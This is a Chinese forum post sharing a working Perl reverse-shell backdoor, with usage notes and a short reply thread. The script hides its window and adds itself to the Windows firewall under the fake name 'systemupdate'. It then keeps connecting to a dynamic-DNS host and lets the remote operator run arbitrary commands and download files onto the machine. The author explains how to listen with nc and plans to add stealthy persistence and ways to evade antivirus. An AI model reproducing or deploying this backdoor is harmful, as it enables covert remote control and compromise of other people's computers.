返回列表 发帖

[原创] perl写的反弹的back door

perl写的反弹的back door


perl写的反弹的back door

#!perl -w
#xtigerdoor.pl  By Xtiger
#需要更新的内容
#1、启动项(这个还没写进去,其实有很多办法实现自启动,但是为了安全嘛还没想好用什么更隐蔽的办法)
#2、隐藏(隐藏后门程序本身?隐藏端口?这个基本上还没什么思路)
use IO::Socket::INET;
use LWP::Simple;
use Win32;

Win32::SetChildShowWindow(0);

open(CMD,"netsh firewall add allowedprogram $0 systemupdate ENABLE |");

$host=shift||'**.3322.org';
$port=shift||'8000';
CONN:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => $port,
                                 Proto    => 'tcp')  or sleep(5) and goto CONN;
print $sock "
           X t i 9 e r 's   B 4 c k D 0 0 r
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  Hi $host I'm Come Back

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
";

while(my $str=<$sock>)
{
  if($str=~/cmd#/)
  {
  my @cmd=split(/\#/,$str);
  open(CMD,"$cmd[1] |");
  while(my $cmdre=<CMD>)
  {
  chomp $cmdre;
  print $sock "$cmdre\n";
  }
  close CMD;
  }
  if($str=~/download#/)  
  {
  my @download=split(/\#/,$str);
  getstore($download[1],$download[2]);
  }
  if($str=~/getpid#/)
  {
  print $sock $$;
  }
}
sleep(5) and goto CONN;

#######################

一、使用
1、直接运行,它就每5秒自动连接远程主机“**.3322.org”,端口“8000”。**.3322.org是注册的动态域名,这个不用多说吧,此程序支持域名,也可以是IP。
2、指定参数,xtigerdoor.pl **.3322.org 80  指定程序连接**.3322.org的80端口。
3、使用NC监听 nc -v -l -p 80
二、程序有以下功能
1、输入命令getpid# ,获得后门程序的进程的PID;
2、输入命令cmd#command,执行命令command;
3、输入命令download#http://url/file#local/path/file ,下载文件http://url/file到本地local/path/file
4、如果是XP以上系统,可以添加系统自带的防火墙的过滤规则,也就是允许后门程序访问网络。
5、去掉use Win32;Win32::SetChildShowWindow(0); 这两句代码,程序同样可以很好的运行在基本上其他任何支持perl(*NIX?MAC?)的系统上。其实我只测试过redhat 9,呵呵,没办法啊,没环境。但是基本上标准的perl发行版本都能支持以上代码。
三、需要改进的地方
1、添加启动项。这个也许是我考虑得太谨慎了吧,现在的安全防护类的软件监视的范围太广了,从注册表监视、文件监视、防篡改、系统文件夹监视,搞得系统稍有风吹草动都不放过。所以我也不知道怎么做好了。还希望大家能给提供一些信息。谢谢!
2、这个搞起来就比较难了,perl毕竟不象C、C++这些。隐藏端口到是可以考虑,因为perl的Socket这段据说也几乎是全盘引用的C里面的定义。有空我得好好看看。
3、程序尺寸的问题,在windows下一般都要编译成exe,其他那些类*NIX系统除非是“精简版”,一般都默认安装perl的。在win下编译成exe后尺寸就太大了。哎,这个也许都不在我的能力范围内了。

    东西写的比较菜,功能也一般,大家多指正。
    要是需要转载请著名作者,虽然技术含量不是很高,但也是琢磨了好久的。

[ 本帖最后由 chinanic 于 2007-6-6 06:51 编辑 ]
.......
学习学习学习学习
.......
It's time to face what we all believe in!
-------------www.Xtiger.net---------------

返回列表 回复 发帖